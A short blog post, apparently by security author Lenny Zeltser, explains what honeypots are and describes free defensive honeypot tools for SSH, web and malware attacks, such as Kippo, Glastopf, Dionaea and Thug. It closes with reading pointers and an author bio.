Specialized Honeypots for SSH, Web and Malware Attacks

A honeypot is a decoy IT infrastructure or application component that is deployed to be attacked. It can take the form of a system, a network or an app, and may be implemented as a real or emulated resource. Since a honeypot has no other purpose, every attempt to interact with it is suspicious.

Honeypots can help discover malicious activities at a lower rate of false positives than traditional intrusion detection approaches. Honeypots can also slow down and mislead the attacker by automatically providing slow responses or incorrect information. Lastly, the logs and artifacts collected by honeypots can be used to learn about the attacker’s capabilities and intentions.

Here are several freely-available honeypot tools specialized for understanding SSH, web and malware attacks:

  • Kippo is an SSH honeypot that can log brute force attacks, where remote the remote attempts to guess logon credentials of an SSH server. Best of all, Kippo is able to record and replay the attacker’s interactions with the emulated shell on the fake SSH server.
  • Glastopf is a web application honeypot. It emulates often-exploited web vulnerabilities, such as remote and local file inclusion and SQL injection. Glastopf examines the attacker’s HTTP request and attempts to respond according to expectations to, for instance, download malicious files.
  • Dionaea is a honeypot for collecting malware. It emulates vulnerabilities in Windows services often targeted by malware, such as SMB, HTTP, TFP and FTP. Dionaea’s handling of the SMB protocol is particularly liked by researchers, as is its ability to emulate the execution of the attacker’s shellcode.
  • Thug is a client-side honeypot (honeyclient) that emulates a web browser. It is designed to automatically interact with the malicious website to explore its exploits and malicious artifacts, often in the form of JavaScript.

In addition to these honeypot tools, you might also explore Honeywall, Honeyd, and INetSim. Additional malware-focused honeypot tools are Omnivora and Amun. For additional pointers, see Wikipedia articles on Honeypots and Client Honeypots. An excellent book on this topic is Virtual Honeypots: From Botnet Tracking to Intrusion Detection by Niels Provos and Thorsten Holz.


About the Author

Lenny Zeltser develops products and programs that use security to achieve business results. He is the CISO at Axonius and Faculty Fellow at SANS Institute. Lenny has been leading efforts to establish resilient security practices and solve hard security problems for over two decades. A respected author and practitioner, he has been advancing tradecraft and contributing to the community. His insights build upon real-world experience, a Computer Science degree from the University of Pennsylvania, and an MBA degree from MIT Sloan.

Learn more